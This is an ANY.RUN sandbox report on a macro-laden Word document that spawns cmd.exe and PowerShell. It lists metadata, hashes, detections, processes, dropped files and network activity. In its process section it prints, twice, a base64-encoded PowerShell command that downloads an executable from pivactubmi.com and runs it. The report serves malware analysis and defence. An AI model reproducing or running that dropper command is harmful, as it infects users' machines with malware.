File name:

information-12.12.2018.doc

Full analysis: https://app.any.run/tasks/9e781954-be54-4097-abf1-e41b01b27144
Verdict: Malicious activity
Analysis date: June 10, 2024, 02:23:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Stand-alone context-sensitive neural-net, Subject: New Mexico Angie, Author: (115)383-0060, Comments: De-engineered incremental array, Template: Normal, Last Saved By: Windows, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 18:59:00 2018, Last Saved Time/Date: Wed Dec 12 10:08:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
MD5:

FA4619AF566F8C5E31DB98D962099E30

SHA1:

16891AC247013FA6B2DCFEE76BD5483122A8747C

SHA256:

57CD3E0488EA7948A778B04DD2D7A16879F77C720CF536282EA0E3E0470C24A7

SSDEEP:

1536:azp0JcviaUp7v+vCyFZDZ3ObwwbM11vlCp2rgVPBxEPYmc69IJSa/To9b7/o:+Up7vNcubwwbM11vlCp2rgVPBxEPYmcn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3964)

    • Microsoft Office executes commands via PowerShell or Cmd

      • WINWORD.EXE (PID: 3964)

    • Unusual execution from MS Office

      • WINWORD.EXE (PID: 3964)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1116)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 1116)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1116)

    • Runs shell command (SCRIPT)

      • WINWORD.EXE (PID: 3964)

    • Reads the Internet Settings

      • powershell.exe (PID: 112)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 112)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 112)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: Russian
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: Stand-alone context-sensitive neural-net
Subject: New Mexico Angie
Author: (115)383-0060
Keywords: -
Comments: De-engineered incremental array
Template: Normal
LastModifiedBy: Пользователь Windows
Software: Microsoft Office Word
CreateDate: 2018:04:19 18:59:00
ModifyDate: 2018:12:12 10:08:00
Security: None
CodePage: Windows Cyrillic
Manager: Katharina Abernathy
Company: Lynch LLC Riley Brakus
Bytes: 23552
CharCountWithSpaces: 2
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 12
TotalEditTime: 3 minutes
Words: -
Characters: 2
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
112poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBwAGkAdgBhAGMAdAB1AGIAbQBpAC4AYwBvAG0ALwB0AHkAYwBsAGEAbQAvAGYAcgBlAHMAcwByAC4AcABoAHAAPwBsAD0AYwByAGUAYgA3AC4AdABrAG4AIgAsACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcADQAYgA5AGMAMgBlADgAYwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwANABiADkAYwAyAGUAOABjAC4AZQB4AGUAJwA7ACAARQB4AGkAdAA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1116cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBwAGkAdgBhAGMAdAB1AGIAbQBpAC4AYwBvAG0ALwB0AHkAYwBsAGEAbQAvAGYAcgBlAHMAcwByAC4AcABoAHAAPwBsAD0AYwByAGUAYgA3AC4AdABrAG4AIgAsACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcADQAYgA5AGMAMgBlADgAYwAuAGUAeABlACcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwANABiADkAYwAyAGUAOABjAC4AZQB4AGUAJwA7ACAARQB4AGkAdAA=C:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3964"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n C:\Users\admin\Desktop\information-12.12.2018.docC:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events
9 251
Read events
8 378
Write events
558
Delete events
315

Modification events

(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:r1?
Value:
72313F007C0F0000010000000000000000000000
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(3964) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
1
Suspicious files
10
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3172.tmp.cvr
MD5:
SHA256:
112powershell.exeC:\Users\admin\AppData\Local\Temp\ske02m2p.zwp.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
112powershell.exeC:\Users\admin\AppData\Local\Temp\fkh5sdml.k5i.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF72E0EDAB0B340246.TMPbinary
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
112powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
3964WINWORD.EXEC:\Users\admin\Desktop\~$formation-12.12.2018.docbinary
MD5:DD44F00318FFDF44A070068814A9B43C
SHA256:D40974CFB620F7D9E584E6183EE7F7F55E621938037E8E097EFEE319213BEA69
3964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:31DB69C6C6B4F550C7F10575BA783615
SHA256:C683EDDA7F445097FDF9915BF2805CBD5E635BB28D0C8B93A320EEF547B75232
3964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{82EDF140-E1EE-4BA1-9461-11B643707B96}.tmpbinary
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
3964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\information-12.12.2018.doc.LNKbinary
MD5:18483CEE4C9BE93B98615FADAFCFAA46
SHA256:B16D612B0BEE2943293B10341B4135FCED30AFFDD14D4FA3C3354237B4A74E3D
3964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:D27D307C9620F0F2B78519B6F5CB7294
SHA256:8A5E3EC0A17A150FA69946625208F77546C15E5247A4A318EE1F7ADA644FFCF5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
224.0.0.252:5355
unknown
1088
svchost.exe
224.0.0.252:5355
unknown
112
powershell.exe
49.13.77.253:80
pivactubmi.com
Hetzner Online GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
pivactubmi.com
  • 49.13.77.253
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
information-12.12.2018.doc